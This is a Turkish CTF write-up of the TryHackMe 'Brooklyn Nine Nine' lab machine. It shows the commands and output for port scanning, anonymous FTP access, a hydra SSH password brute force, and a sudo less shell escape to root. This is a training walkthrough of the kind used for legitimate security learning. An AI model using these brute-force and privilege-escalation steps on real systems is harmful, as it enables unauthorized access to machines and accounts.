Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Brooklyn Nine Nine” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
> nmap -sS -sV 10.10.85.170
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 18:35 +03
Nmap scan report for 10.10.85.170
Host is up (0.076s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
2 — “anonymous:anonymous” bilgileri ile FTP servisine giriş yaparak dosyaları indiriyorum.
> ftp 10.10.85.170
Connected to 10.10.85.170.
220 (vsFTPd 3.0.3)
Name (10.10.85.170:alper): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||30845|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
3 — txt dosyasını okuduğum zaman “amy” ve “jake” adında iki kullanıcının konuşmalarını görüyorum. Amy kullanıcısı Jake kullanıcısına parolasını değiştirmesini söylüyor. *hydra* aracı ile jake kullanıcısı ile ssh servisine bir saldırı başlatıyorum.
> hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.85.170
*
*
[22][ssh] host: 10.10.85.170 login: jake password: XXXCENSOREDXXX
*
*
4 — SSH bağlantısından sonra ilk bayrağımı bulmak için find komutunu kullanıyorum. Daha sonra ilgili dizindeki bayrak dosyasını okuyarak ilk bayrağı elde ediyorum.
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ find / -type f -name "user.txt" 2>/dev/null
/home/holt/user.txt
jake@brookly_nine_nine:~$ cat /home/holt/user.txt
***CENSORED***
5 — “sudo -l” komutu ile sudo yetkisi ile çalıştırabileceğim komutları görüntülüyorum. GTFObins sitesinden “less” komutundaki sudo yetkisini nasıl suistimal edebileceğimi öğreniyorum.
jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
6 — Less komutu ile herhangi bir dosyayı okuyarak ekran geldiğinde klavyeden “!/bin/sh” yazarak root kullanıcısına geçiyorum. Daha sonra root dizinindeki ikinci bayrağı da elde ederek odayı tamamlıyorum.
jake@brookly_nine_nine:~$ sudo less /etc/profile
# whoami
root
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: ***CENSORED***
Enjoy!!